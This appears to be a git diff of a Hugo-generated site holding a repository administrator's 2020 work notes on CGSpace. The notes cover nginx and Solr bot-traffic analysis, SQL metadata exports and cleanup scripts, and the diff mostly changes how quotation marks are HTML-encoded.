<li>I created an nginx map based on the host&rsquo;s IP address that sets a temporary user agent (ua) and then changed the conditional in the REST API location block so that it checks this mapped ua instead of the default one
<ul>
@ -497,11 +497,11 @@ Total number of bot hits purged: 29025
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ curl -s 'https://cgspace.cgiar.org/rest/handle/10568/51671?expand=collections' 'https://cgspace.cgiar.org/rest/handle/10568/89346?expand=collections' | grep -oE '10568/[0-9]+' | sort | uniq &gt; /tmp/cip-collections.txt
<pre tabindex="0"><code>$ curl -s &#39;https://cgspace.cgiar.org/rest/handle/10568/51671?expand=collections&#39; &#39;https://cgspace.cgiar.org/rest/handle/10568/89346?expand=collections&#39; | grep -oE &#39;10568/[0-9]+&#39; | sort | uniq &gt; /tmp/cip-collections.txt
</code></pre><ul>
<li>Then I formatted it into a SQL query and exported a CSV:</li>
</ul>
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value AS author, COUNT(*) FROM metadatavalue WHERE metadata_field_id = (SELECT metadata_field_id FROM metadatafieldregistry WHERE element = 'contributor' AND qualifier = 'author') AND resource_type_id = 2 AND resource_id IN (SELECT item_id FROM collection2item WHERE collection_id IN (SELECT resource_id FROM hANDle WHERE hANDle IN ('10568/100533', '10568/100653', '10568/101955', '10568/106580', '10568/108469', '10568/51671', '10568/53085', '10568/53086', '10568/53087', '10568/53088', '10568/53089', '10568/53090', '10568/53091', '10568/53092', '10568/53093', '10568/53094', '10568/64874', '10568/69069', '10568/70150', '10568/88229', '10568/89346', '10568/89347', '10568/99301', '10568/99302', '10568/99303', '10568/99304', '10568/99428'))) GROUP BY text_value ORDER BY count DESC) TO /tmp/cip-authors.csv WITH CSV;
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value AS author, COUNT(*) FROM metadatavalue WHERE metadata_field_id = (SELECT metadata_field_id FROM metadatafieldregistry WHERE element = &#39;contributor&#39; AND qualifier = &#39;author&#39;) AND resource_type_id = 2 AND resource_id IN (SELECT item_id FROM collection2item WHERE collection_id IN (SELECT resource_id FROM hANDle WHERE hANDle IN (&#39;10568/100533&#39;, &#39;10568/100653&#39;, &#39;10568/101955&#39;, &#39;10568/106580&#39;, &#39;10568/108469&#39;, &#39;10568/51671&#39;, &#39;10568/53085&#39;, &#39;10568/53086&#39;, &#39;10568/53087&#39;, &#39;10568/53088&#39;, &#39;10568/53089&#39;, &#39;10568/53090&#39;, &#39;10568/53091&#39;, &#39;10568/53092&#39;, &#39;10568/53093&#39;, &#39;10568/53094&#39;, &#39;10568/64874&#39;, &#39;10568/69069&#39;, &#39;10568/70150&#39;, &#39;10568/88229&#39;, &#39;10568/89346&#39;, &#39;10568/89347&#39;, &#39;10568/99301&#39;, &#39;10568/99302&#39;, &#39;10568/99303&#39;, &#39;10568/99304&#39;, &#39;10568/99428&#39;))) GROUP BY text_value ORDER BY count DESC) TO /tmp/cip-authors.csv WITH CSV;
COPY 3917
</code></pre><h2 id="2020-06-15">2020-06-15</h2>
<ul>
@ -632,7 +632,7 @@ COPY 3917
</li>
<li>I also notice that there is a <a href="https://www.crossref.org/services/funder-registry/">CrossRef funders registry</a> with 23,000+ funders that you can <a href="https://gitlab.com/crossref/open_funder_registry">download as RDF</a> or <a href="https://www.crossref.org/education/funder-registry/accessing-the-funder-registry/">access via an API</a></li>
</ul>
<pre tabindex="0"><code>$ http 'https://api.crossref.org/funders?query=Bill+and+Melinda+Gates&amp;mailto=a.orth@cgiar.org'
<pre tabindex="0"><code>$ http &#39;https://api.crossref.org/funders?query=Bill+and+Melinda+Gates&amp;mailto=a.orth@cgiar.org&#39;
</code></pre><ul>
<li>Searching for &ldquo;Bill and Melinda Gates&rdquo; we can see the <code>name</code> literal and a list of <code>alt-names</code> literals
<ul>
@ -697,14 +697,14 @@ SUSTAIN
AGRICULTURAL INNOVATIONS
NATIVE VARIETIES
PHYTOPHTHORA INFESTANS
$ ./delete-metadata-values.py -i /tmp/2020-06-30-remove-cip-subjects.csv -db dspace -u dspace -p 'fuuu' -f cg.subject.cip -m 127 -d
$ ./delete-metadata-values.py -i /tmp/2020-06-30-remove-cip-subjects.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.subject.cip -m 127 -d
</code></pre><ul>
<li>She also wants to change their <code>SWEET POTATOES</code> term to <code>SWEETPOTATOES</code>, both in the CIP subject list and existing items so I updated those too:</li>
</ul>
<pre tabindex="0"><code>$ cat /tmp/2020-06-30-fix-cip-subjects.csv
cg.subject.cip,correct
SWEET POTATOES,SWEETPOTATOES
$ ./fix-metadata-values.py -i /tmp/2020-06-30-fix-cip-subjects.csv -db dspace -u dspace -p 'fuuu' -f cg.subject.cip -t correct -m 127 -d
$ ./fix-metadata-values.py -i /tmp/2020-06-30-fix-cip-subjects.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.subject.cip -t correct -m 127 -d
</code></pre><ul>
<li>She also finished doing all the corrections to authors that I had sent her last week, but many of the changes are removing Spanish accents from authors names so I asked if she&rsquo;s really should she wants to do that</li>
<li>I ran the fixes and deletes on CGSpace, but not on DSpace Test yet because those scripts need updating for DSpace 6 UUIDs</li>
@ -712,63 +712,63 @@ $ ./fix-metadata-values.py -i /tmp/2020-06-30-fix-cip-subjects.csv -db dspace -u
</ul>
<pre tabindex="0"><code>$ cat 2020-06-29-fix-sponsors.csv
dc.description.sponsorship,correct
&quot;Conselho Nacional de Desenvolvimento Científico e Tecnológico, Brazil&quot;,&quot;Conselho Nacional de Desenvolvimento Científico e Tecnológico&quot;
&quot;Claussen Simon Stiftung&quot;,&quot;Claussen-Simon-Stiftung&quot;
&quot;Fonds pour la formation á la Recherche dans l'Industrie et dans l'Agriculture, Belgium&quot;,&quot;Fonds pour la Formation à la Recherche dans lIndustrie et dans lAgriculture&quot;
&quot;Fundação de Amparo à Pesquisa do Estado de São Paulo, Brazil&quot;,&quot;Fundação de Amparo à Pesquisa do Estado de São Paulo&quot;
&quot;Schlumberger Foundation Faculty for the Future&quot;,&quot;Schlumberger Foundation&quot;
&quot;Wildlife Conservation Society, United States&quot;,&quot;Wildlife Conservation Society&quot;
&quot;Portuguese Foundation for Science and Technology&quot;,&quot;Portuguese Science and Technology Foundation&quot;
&quot;Wageningen University and Research&quot;,&quot;Wageningen University and Research Centre&quot;
&quot;Leverhulme Centre for Integrative Research in Agriculture and Health&quot;,&quot;Leverhulme Centre for Integrative Research on Agriculture and Health&quot;
&quot;Natural Science and Engineering Research Council of Canada&quot;,&quot;Natural Sciences and Engineering Research Council of Canada&quot;
&quot;Biotechnology and Biological Sciences Research Council, United Kingdom&quot;,&quot;Biotechnology and Biological Sciences Research Council&quot;
&quot;Home Grown Ceraels Authority United Kingdom&quot;,&quot;Home-Grown Cereals Authority&quot;
&quot;Fiat Panis Foundation&quot;,&quot;Foundation fiat panis&quot;
&quot;Defence Science and Technology Laboratory, United Kingdom&quot;,&quot;Defence Science and Technology Laboratory&quot;
&quot;African Development Bank&quot;,&quot;African Development Bank Group&quot;
&quot;Ministry of Health, Labour, and Welfare, Japan&quot;,&quot;Ministry of Health, Labour and Welfare&quot;
&quot;World Academy of Sciences&quot;,&quot;The World Academy of Sciences&quot;
&quot;Agricultural Research Council, South Africa&quot;,&quot;Agricultural Research Council&quot;
&quot;Department of Homeland Security, USA&quot;,&quot;U.S. Department of Homeland Security&quot;
&quot;Quadram Institute&quot;,&quot;Quadram Institute Bioscience&quot;
&quot;Google.org&quot;,&quot;Google&quot;
&quot;Department for Environment, Food and Rural Affairs, United Kingdom&quot;,&quot;Department for Environment, Food and Rural Affairs, UK Government&quot;
&quot;National Commission for Science, Technology and Innovation, Kenya&quot;,&quot;National Commission for Science, Technology and Innovation&quot;
&quot;Hainan Province Natural Science Foundation of China&quot;,&quot;Natural Science Foundation of Hainan Province&quot;
&quot;German Society for International Cooperation (GIZ)&quot;,&quot;GIZ&quot;
&quot;German Federal Ministry of Food and Agriculture&quot;,&quot;Federal Ministry of Food and Agriculture&quot;
&quot;State Key Laboratory of Environmental Geochemistry, China&quot;,&quot;State Key Laboratory of Environmental Geochemistry&quot;
&quot;QUT student scholarship&quot;,&quot;Queensland University of Technology&quot;
&quot;Australia Centre for International Agricultural Research&quot;,&quot;Australian Centre for International Agricultural Research&quot;
&quot;Belgian Science Policy&quot;,&quot;Belgian Federal Science Policy Office&quot;
&quot;U.S. Department of Agriculture USDA&quot;,&quot;U.S. Department of Agriculture&quot;
&quot;U.S.. Department of Agriculture (USDA)&quot;,&quot;U.S. Department of Agriculture&quot;
&quot;Fundação de Amparo à Pesquisa do Estado de São Paulo ( FAPESP)&quot;,&quot;Fundação de Amparo à Pesquisa do Estado de São Paulo&quot;
&quot;Fundação de Amparo à Pesquisa do Estado do Rio Grande do Sul, Brazil&quot;,&quot;Fundação de Amparo à Pesquisa do Estado do Rio Grande do Sul&quot;
&quot;Fundação de Amparo à Pesquisa do Estado do Rio de Janeiro, Brazil&quot;,&quot;Fundação Carlos Chagas Filho de Amparo à Pesquisa do Estado do Rio de Janeiro&quot;
&quot;Swedish University of Agricultural Sciences (SLU)&quot;,&quot;Swedish University of Agricultural Sciences&quot;
&quot;U.S. Department of Agriculture (USDA)&quot;,&quot;U.S. Department of Agriculture&quot;
&quot;Swedish International Development Cooperation Agency (Sida)&quot;,&quot;Sida&quot;
&quot;Swedish International Development Agency&quot;,&quot;Sida&quot;
&quot;Federal Ministry for Economic Cooperation and Development, Germany&quot;,&quot;Federal Ministry for Economic Cooperation and Development&quot;
&quot;Natural Environment Research Council, United Kingdom&quot;,&quot;Natural Environment Research Council&quot;
&quot;Economic and Social Research Council, United Kingdom&quot;,&quot;Economic and Social Research Council&quot;
&quot;Medical Research Council, United Kingdom&quot;,&quot;Medical Research Council&quot;
&quot;Federal Ministry for Education and Research, Germany&quot;,&quot;Federal Ministry for Education, Science, Research and Technology&quot;
&quot;UK Governments Department for International Development&quot;,&quot;Department for International Development, UK Government&quot;
&quot;Department for International Development, United Kingdom&quot;,&quot;Department for International Development, UK Government&quot;
&quot;United Nations Children's Fund&quot;,&quot;United Nations Children's Emergency Fund&quot;
&quot;Swedish Research Council for Environment, Agricultural Science and Spatial Planning&quot;,&quot;Swedish Research Council for Environment, Agricultural Sciences and Spatial Planning&quot;
&quot;Agence Nationale de la Recherche, France&quot;,&quot;French National Research Agency&quot;
&quot;Fondation pour la recherche sur la biodiversité&quot;,&quot;Foundation for Research on Biodiversity&quot;
&quot;Programa Nacional de Innovacion Agraria, Peru&quot;,&quot;Programa Nacional de Innovación Agraria, Peru&quot;
&quot;United States Agency for International Development (USAID)&quot;,&quot;United States Agency for International Development&quot;
&quot;West Africa Agricultural Productivity Programme&quot;,&quot;West Africa Agricultural Productivity Program&quot;
&quot;West African Agricultural Productivity Project&quot;,&quot;West Africa Agricultural Productivity Program&quot;
&quot;Rural Development Administration, Republic of Korea&quot;,&quot;Rural Development Administration&quot;
&quot;UKs Biotechnology and Biological Sciences Research Council (BBSRC)&quot;,&quot;Biotechnology and Biological Sciences Research Council&quot;
$ ./fix-metadata-values.py -i /tmp/2020-06-29-fix-sponsors.csv -db dspace -u dspace -p 'fuuu' -f dc.description.sponsorship -t correct -m 29
&#34;Conselho Nacional de Desenvolvimento Científico e Tecnológico, Brazil&#34;,&#34;Conselho Nacional de Desenvolvimento Científico e Tecnológico&#34;
&#34;Claussen Simon Stiftung&#34;,&#34;Claussen-Simon-Stiftung&#34;
&#34;Fonds pour la formation á la Recherche dans l&#39;Industrie et dans l&#39;Agriculture, Belgium&#34;,&#34;Fonds pour la Formation à la Recherche dans lIndustrie et dans lAgriculture&#34;
&#34;Fundação de Amparo à Pesquisa do Estado de São Paulo, Brazil&#34;,&#34;Fundação de Amparo à Pesquisa do Estado de São Paulo&#34;
&#34;Schlumberger Foundation Faculty for the Future&#34;,&#34;Schlumberger Foundation&#34;
&#34;Wildlife Conservation Society, United States&#34;,&#34;Wildlife Conservation Society&#34;
&#34;Portuguese Foundation for Science and Technology&#34;,&#34;Portuguese Science and Technology Foundation&#34;
&#34;Wageningen University and Research&#34;,&#34;Wageningen University and Research Centre&#34;
&#34;Leverhulme Centre for Integrative Research in Agriculture and Health&#34;,&#34;Leverhulme Centre for Integrative Research on Agriculture and Health&#34;
&#34;Natural Science and Engineering Research Council of Canada&#34;,&#34;Natural Sciences and Engineering Research Council of Canada&#34;
&#34;Biotechnology and Biological Sciences Research Council, United Kingdom&#34;,&#34;Biotechnology and Biological Sciences Research Council&#34;
&#34;Home Grown Ceraels Authority United Kingdom&#34;,&#34;Home-Grown Cereals Authority&#34;
&#34;Fiat Panis Foundation&#34;,&#34;Foundation fiat panis&#34;
&#34;Defence Science and Technology Laboratory, United Kingdom&#34;,&#34;Defence Science and Technology Laboratory&#34;
&#34;African Development Bank&#34;,&#34;African Development Bank Group&#34;
&#34;Ministry of Health, Labour, and Welfare, Japan&#34;,&#34;Ministry of Health, Labour and Welfare&#34;
&#34;World Academy of Sciences&#34;,&#34;The World Academy of Sciences&#34;
&#34;Agricultural Research Council, South Africa&#34;,&#34;Agricultural Research Council&#34;
&#34;Department of Homeland Security, USA&#34;,&#34;U.S. Department of Homeland Security&#34;
&#34;Quadram Institute&#34;,&#34;Quadram Institute Bioscience&#34;
&#34;Google.org&#34;,&#34;Google&#34;
&#34;Department for Environment, Food and Rural Affairs, United Kingdom&#34;,&#34;Department for Environment, Food and Rural Affairs, UK Government&#34;
&#34;National Commission for Science, Technology and Innovation, Kenya&#34;,&#34;National Commission for Science, Technology and Innovation&#34;
&#34;Hainan Province Natural Science Foundation of China&#34;,&#34;Natural Science Foundation of Hainan Province&#34;
&#34;German Society for International Cooperation (GIZ)&#34;,&#34;GIZ&#34;
&#34;German Federal Ministry of Food and Agriculture&#34;,&#34;Federal Ministry of Food and Agriculture&#34;
&#34;State Key Laboratory of Environmental Geochemistry, China&#34;,&#34;State Key Laboratory of Environmental Geochemistry&#34;
&#34;QUT student scholarship&#34;,&#34;Queensland University of Technology&#34;
&#34;Australia Centre for International Agricultural Research&#34;,&#34;Australian Centre for International Agricultural Research&#34;
&#34;Belgian Science Policy&#34;,&#34;Belgian Federal Science Policy Office&#34;
&#34;U.S. Department of Agriculture USDA&#34;,&#34;U.S. Department of Agriculture&#34;
&#34;U.S.. Department of Agriculture (USDA)&#34;,&#34;U.S. Department of Agriculture&#34;
&#34;Fundação de Amparo à Pesquisa do Estado de São Paulo ( FAPESP)&#34;,&#34;Fundação de Amparo à Pesquisa do Estado de São Paulo&#34;
&#34;Fundação de Amparo à Pesquisa do Estado do Rio Grande do Sul, Brazil&#34;,&#34;Fundação de Amparo à Pesquisa do Estado do Rio Grande do Sul&#34;
&#34;Fundação de Amparo à Pesquisa do Estado do Rio de Janeiro, Brazil&#34;,&#34;Fundação Carlos Chagas Filho de Amparo à Pesquisa do Estado do Rio de Janeiro&#34;
&#34;Swedish University of Agricultural Sciences (SLU)&#34;,&#34;Swedish University of Agricultural Sciences&#34;
&#34;U.S. Department of Agriculture (USDA)&#34;,&#34;U.S. Department of Agriculture&#34;
&#34;Swedish International Development Cooperation Agency (Sida)&#34;,&#34;Sida&#34;
&#34;Swedish International Development Agency&#34;,&#34;Sida&#34;
&#34;Federal Ministry for Economic Cooperation and Development, Germany&#34;,&#34;Federal Ministry for Economic Cooperation and Development&#34;
&#34;Natural Environment Research Council, United Kingdom&#34;,&#34;Natural Environment Research Council&#34;
&#34;Economic and Social Research Council, United Kingdom&#34;,&#34;Economic and Social Research Council&#34;
&#34;Medical Research Council, United Kingdom&#34;,&#34;Medical Research Council&#34;
&#34;Federal Ministry for Education and Research, Germany&#34;,&#34;Federal Ministry for Education, Science, Research and Technology&#34;
&#34;UK Governments Department for International Development&#34;,&#34;Department for International Development, UK Government&#34;
&#34;Department for International Development, United Kingdom&#34;,&#34;Department for International Development, UK Government&#34;
&#34;United Nations Children&#39;s Fund&#34;,&#34;United Nations Children&#39;s Emergency Fund&#34;
&#34;Swedish Research Council for Environment, Agricultural Science and Spatial Planning&#34;,&#34;Swedish Research Council for Environment, Agricultural Sciences and Spatial Planning&#34;
&#34;Agence Nationale de la Recherche, France&#34;,&#34;French National Research Agency&#34;
&#34;Fondation pour la recherche sur la biodiversité&#34;,&#34;Foundation for Research on Biodiversity&#34;
&#34;Programa Nacional de Innovacion Agraria, Peru&#34;,&#34;Programa Nacional de Innovación Agraria, Peru&#34;
&#34;United States Agency for International Development (USAID)&#34;,&#34;United States Agency for International Development&#34;
&#34;West Africa Agricultural Productivity Programme&#34;,&#34;West Africa Agricultural Productivity Program&#34;
&#34;West African Agricultural Productivity Project&#34;,&#34;West Africa Agricultural Productivity Program&#34;
&#34;Rural Development Administration, Republic of Korea&#34;,&#34;Rural Development Administration&#34;
&#34;UKs Biotechnology and Biological Sciences Research Council (BBSRC)&#34;,&#34;Biotechnology and Biological Sciences Research Council&#34;
$ ./fix-metadata-values.py -i /tmp/2020-06-29-fix-sponsors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.description.sponsorship -t correct -m 29
</code></pre><ul>
<li>Then I started a full re-index at batch CPU priority:</li>
</ul>
@ -784,9 +784,9 @@ sys 2m56.635s
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS=&quot;-Xmx512m -Dfile.encoding=UTF-8&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Xmx512m -Dfile.encoding=UTF-8&#34;
$ dspace metadata-export -i 10568/1 -f /tmp/ilri.cs
$ csvcut -c 'id,cg.subject.ilri[],cg.subject.ilri[en_US],dc.subject[en_US]' /tmp/ilri.csv &gt; /tmp/ilri-covid19.csv
$ csvcut -c &#39;id,cg.subject.ilri[],cg.subject.ilri[en_US],dc.subject[en_US]&#39; /tmp/ilri.csv &gt; /tmp/ilri-covid19.csv
</code></pre><ul>
<li>I see that all items with &ldquo;COVID19&rdquo; already have &ldquo;CORONAVIRUS DISEASE&rdquo; so I don&rsquo;t need to do anything</li>
</ul>

View File

@ -38,7 +38,7 @@ I restarted Tomcat and PostgreSQL and the issue was gone
Since I was restarting Tomcat anyways I decided to redeploy the latest changes from the 5_x-prod branch and I added a note about COVID-19 items to the CGSpace frontpage at Peter&rsquo;s request
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -139,7 +139,7 @@ Since I was restarting Tomcat anyways I decided to redeploy the latest changes f
<li>Also, Linode is alerting that we had high outbound traffic rate early this morning around midnight AND high CPU load later in the morning</li>
<li>First looking at the traffic in the morning:</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/*.log.1 /var/log/nginx/*.log | grep -E &quot;01/Jul/2020:(00|01|02|03|04)&quot; | goaccess --log-format=COMBINED -
<pre tabindex="0"><code># cat /var/log/nginx/*.log.1 /var/log/nginx/*.log | grep -E &#34;01/Jul/2020:(00|01|02|03|04)&#34; | goaccess --log-format=COMBINED -
...
9659 33.56% 1 0.08% 340.94 MiB 64.39.99.13
3317 11.53% 1 0.08% 871.71 MiB 199.47.87.140
@ -153,8 +153,8 @@ Since I was restarting Tomcat anyways I decided to redeploy the latest changes f
<li>I will purge hits from that IP from Solr</li>
<li>The 199.47.87.x IPs belong to Turnitin, and apparently they are NOT marked as bots and we have 40,000 hits from them in 2020 statistics alone:</li>
</ul>
<pre tabindex="0"><code>$ curl -s &quot;http://localhost:8081/solr/statistics/select&quot; -d &quot;q=userAgent:/Turnitin.*/&amp;rows=0&quot; | grep -oE 'numFound=&quot;[0-9]+&quot;'
numFound=&quot;41694&quot;
<pre tabindex="0"><code>$ curl -s &#34;http://localhost:8081/solr/statistics/select&#34; -d &#34;q=userAgent:/Turnitin.*/&amp;rows=0&#34; | grep -oE &#39;numFound=&#34;[0-9]+&#34;&#39;
numFound=&#34;41694&#34;
</code></pre><ul>
<li>They used to be &ldquo;TurnitinBot&rdquo;&hellip; hhmmmm, seems they use both: <a href="https://turnitin.com/robot/crawlerinfo.html">https://turnitin.com/robot/crawlerinfo.html</a></li>
<li>I will add Turnitin to the DSpace bot user agent list, but I see they are reqesting <code>robots.txt</code> and only requesting item pages, so that&rsquo;s impressive! I don&rsquo;t need to add them to the &ldquo;bad bot&rdquo; rate limit list in nginx</li>
@ -164,9 +164,9 @@ numFound=&quot;41694&quot;
</code></pre><ul>
<li>The IPs all belong to HostRoyale:</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep '01/Jul/2020' | awk '{print $1}' | grep 185.152.250. | sort | uniq | wc -l
<pre tabindex="0"><code># cat /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep &#39;01/Jul/2020&#39; | awk &#39;{print $1}&#39; | grep 185.152.250. | sort | uniq | wc -l
81
# cat /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep '01/Jul/2020' | awk '{print $1}' | grep 185.152.250. | sort | uniq | sort -h
# cat /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep &#39;01/Jul/2020&#39; | awk &#39;{print $1}&#39; | grep 185.152.250. | sort | uniq | sort -h
185.152.250.1
185.152.250.101
185.152.250.103
@ -269,7 +269,7 @@ numFound=&quot;41694&quot;
<li>I purged 20,000 hits from IPs and 45,000 hits from user agents</li>
<li>I will revert the default &ldquo;example&rdquo; agents file back to the upstream master branch of COUNTER-Robots, and then add all my custom ones that are pending in pull requests they haven&rsquo;t merged yet:</li>
</ul>
<pre tabindex="0"><code>$ diff --unchanged-line-format= --old-line-format= --new-line-format='%L' dspace/config/spiders/agents/example ~/src/git/COUNTER-Robots/COUNTER_Robots_list.txt
<pre tabindex="0"><code>$ diff --unchanged-line-format= --old-line-format= --new-line-format=&#39;%L&#39; dspace/config/spiders/agents/example ~/src/git/COUNTER-Robots/COUNTER_Robots_list.txt
Citoid
ecointernet
GigablastOpenSource
@ -285,7 +285,7 @@ Typhoeus
</code></pre><ul>
<li>Just a note that I <em>still</em> can&rsquo;t deploy the <code>6_x-dev-atmire-modules</code> branch as it fails at ant update:</li>
</ul>
<pre tabindex="0"><code> [java] java.lang.RuntimeException: Failed to startup the DSpace Service Manager: failure starting up spring service manager: Error creating bean with name 'DefaultStorageUpdateConfig': Injection of autowired dependencies failed; nested exception is org.springframework.beans.factory.BeanCreationException: Could not autowire method: public void com.atmire.statistics.util.StorageReportsUpdater.setStorageReportServices(java.util.List); nested exception is org.springframework.beans.factory.BeanCreationException: Error creating bean with name 'cuaEPersonStorageReportService': Injection of autowired dependencies failed; nested exception is org.springframework.beans.factory.BeanCreationException: Could not autowire field: private com.atmire.dspace.cua.dao.storage.CUAEPersonStorageReportDAO com.atmire.dspace.cua.CUAStorageReportServiceImpl$CUAEPersonStorageReportServiceImpl.CUAEPersonStorageReportDAO; nested exception is org.springframework.beans.factory.NoUniqueBeanDefinitionException: No qualifying bean of type [com.atmire.dspace.cua.dao.storage.CUAEPersonStorageReportDAO] is defined: expected single matching bean but found 2: com.atmire.dspace.cua.dao.impl.CUAStorageReportDAOImpl$CUAEPersonStorageReportDAOImpl#0,com.atmire.dspace.cua.dao.impl.CUAStorageReportDAOImpl$CUAEPersonStorageReportDAOImpl#1
<pre tabindex="0"><code> [java] java.lang.RuntimeException: Failed to startup the DSpace Service Manager: failure starting up spring service manager: Error creating bean with name &#39;DefaultStorageUpdateConfig&#39;: Injection of autowired dependencies failed; nested exception is org.springframework.beans.factory.BeanCreationException: Could not autowire method: public void com.atmire.statistics.util.StorageReportsUpdater.setStorageReportServices(java.util.List); nested exception is org.springframework.beans.factory.BeanCreationException: Error creating bean with name &#39;cuaEPersonStorageReportService&#39;: Injection of autowired dependencies failed; nested exception is org.springframework.beans.factory.BeanCreationException: Could not autowire field: private com.atmire.dspace.cua.dao.storage.CUAEPersonStorageReportDAO com.atmire.dspace.cua.CUAStorageReportServiceImpl$CUAEPersonStorageReportServiceImpl.CUAEPersonStorageReportDAO; nested exception is org.springframework.beans.factory.NoUniqueBeanDefinitionException: No qualifying bean of type [com.atmire.dspace.cua.dao.storage.CUAEPersonStorageReportDAO] is defined: expected single matching bean but found 2: com.atmire.dspace.cua.dao.impl.CUAStorageReportDAOImpl$CUAEPersonStorageReportDAOImpl#0,com.atmire.dspace.cua.dao.impl.CUAStorageReportDAOImpl$CUAEPersonStorageReportDAOImpl#1
</code></pre><ul>
<li>I had told Atmire about this several weeks ago&hellip; but I reminded them again in the ticket
<ul>
@ -308,23 +308,23 @@ Typhoeus
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ curl -g -s 'http://localhost:8081/solr/statistics-2019/select?q=*:*&amp;fq=time:%5B2019-01-01T00%3A00%3A00Z%20TO%202019-06-30T23%3A59%3A59Z%5D&amp;rows=0&amp;wt=json&amp;indent=true'
<pre tabindex="0"><code>$ curl -g -s &#39;http://localhost:8081/solr/statistics-2019/select?q=*:*&amp;fq=time:%5B2019-01-01T00%3A00%3A00Z%20TO%202019-06-30T23%3A59%3A59Z%5D&amp;rows=0&amp;wt=json&amp;indent=true&#39;
{
&quot;responseHeader&quot;:{
&quot;status&quot;:0,
&quot;QTime&quot;:0,
&quot;params&quot;:{
&quot;q&quot;:&quot;*:*&quot;,
&quot;indent&quot;:&quot;true&quot;,
&quot;fq&quot;:&quot;time:[2019-01-01T00:00:00Z TO 2019-06-30T23:59:59Z]&quot;,
&quot;rows&quot;:&quot;0&quot;,
&quot;wt&quot;:&quot;json&quot;}},
&quot;response&quot;:{&quot;numFound&quot;:7784285,&quot;start&quot;:0,&quot;docs&quot;:[]
&#34;responseHeader&#34;:{
&#34;status&#34;:0,
&#34;QTime&#34;:0,
&#34;params&#34;:{
&#34;q&#34;:&#34;*:*&#34;,
&#34;indent&#34;:&#34;true&#34;,
&#34;fq&#34;:&#34;time:[2019-01-01T00:00:00Z TO 2019-06-30T23:59:59Z]&#34;,
&#34;rows&#34;:&#34;0&#34;,
&#34;wt&#34;:&#34;json&#34;}},
&#34;response&#34;:{&#34;numFound&#34;:7784285,&#34;start&#34;:0,&#34;docs&#34;:[]
}}
</code></pre><ul>
<li>But not in solr-import-export-json&hellip; hmmm&hellip; seems we need to URL encode <em>only</em> the date range itself, but not the brackets:</li>
</ul>
<pre tabindex="0"><code>$ ./run.sh -s http://localhost:8081/solr/statistics-2019 -a export -o /tmp/statistics-2019-1.json -f 'time:%5B2019-01-01T00%3A00%3A00Z%20TO%202019-06-30T23%3A59%3A59Z]' -k uid
<pre tabindex="0"><code>$ ./run.sh -s http://localhost:8081/solr/statistics-2019 -a export -o /tmp/statistics-2019-1.json -f &#39;time:%5B2019-01-01T00%3A00%3A00Z%20TO%202019-06-30T23%3A59%3A59Z]&#39; -k uid
$ zstd /tmp/statistics-2019-1.json
</code></pre><ul>
<li>Then import it on my local dev environment:</li>
@ -358,11 +358,11 @@ $ ./run.sh -s http://localhost:8080/solr/statistics -a import -o ~/Downloads/sta
</li>
<li>I noticed that we have 20,000 distinct values for <code>dc.subject</code>, but there are at least 500 that are lower or mixed case that we should simply uppercase without further thought:</li>
</ul>
<pre tabindex="0"><code>dspace=# UPDATE metadatavalue SET text_value=UPPER(text_value) WHERE resource_type_id=2 AND metadata_field_id=57 AND text_value ~ '[[:lower:]]';
<pre tabindex="0"><code>dspace=# UPDATE metadatavalue SET text_value=UPPER(text_value) WHERE resource_type_id=2 AND metadata_field_id=57 AND text_value ~ &#39;[[:lower:]]&#39;;
</code></pre><ul>
<li>DSpace Test needs a different query because it is running DSpace 6 with UUIDs for everything:</li>
</ul>
<pre tabindex="0"><code>dspace63=# UPDATE metadatavalue SET text_value=UPPER(text_value) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=57 AND text_value ~ '[[:lower:]]';
<pre tabindex="0"><code>dspace63=# UPDATE metadatavalue SET text_value=UPPER(text_value) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=57 AND text_value ~ &#39;[[:lower:]]&#39;;
</code></pre><ul>
<li>Note the use of the POSIX character class :)</li>
<li>I suggest that we generate a list of the top 5,000 values that don&rsquo;t match AGROVOC so that Sisay can correct them
@ -399,16 +399,16 @@ $ csvcut -c1 /tmp/2020-07-05-subjects-upper.csv | head -n 6500 &gt; 2020-07-05-c
<ul>
<li>Peter asked me to send him a list of sponsors on CGSpace</li>
</ul>
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value as &quot;dc.description.sponsorship&quot;, count(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=29 GROUP BY &quot;dc.description.sponsorship&quot; ORDER BY count DESC) TO /tmp/2020-07-07-sponsors.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value as &#34;dc.description.sponsorship&#34;, count(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=29 GROUP BY &#34;dc.description.sponsorship&#34; ORDER BY count DESC) TO /tmp/2020-07-07-sponsors.csv WITH CSV HEADER;
COPY 707
</code></pre><ul>
<li>I ran it quickly through my <code>csv-metadata-quality</code> tool and found two issues that I will correct with <code>fix-metadata-values.py</code> on CGSpace immediately:</li>
</ul>
<pre tabindex="0"><code>$ cat 2020-07-07-fix-sponsors.csv
dc.description.sponsorship,correct
&quot;Ministe`re des Affaires Etrange`res et Européennes, France&quot;,&quot;Ministère des Affaires Étrangères et Européennes, France&quot;
&quot;Global Food Security Programme, United Kingdom&quot;,&quot;Global Food Security Programme, United Kingdom&quot;
$ ./fix-metadata-values.py -i 2020-07-07-fix-sponsors.csv -db dspace -u dspace -p 'fuuu' -f dc.description.sponsorship -t correct -m 29
&#34;Ministe`re des Affaires Etrange`res et Européennes, France&#34;,&#34;Ministère des Affaires Étrangères et Européennes, France&#34;
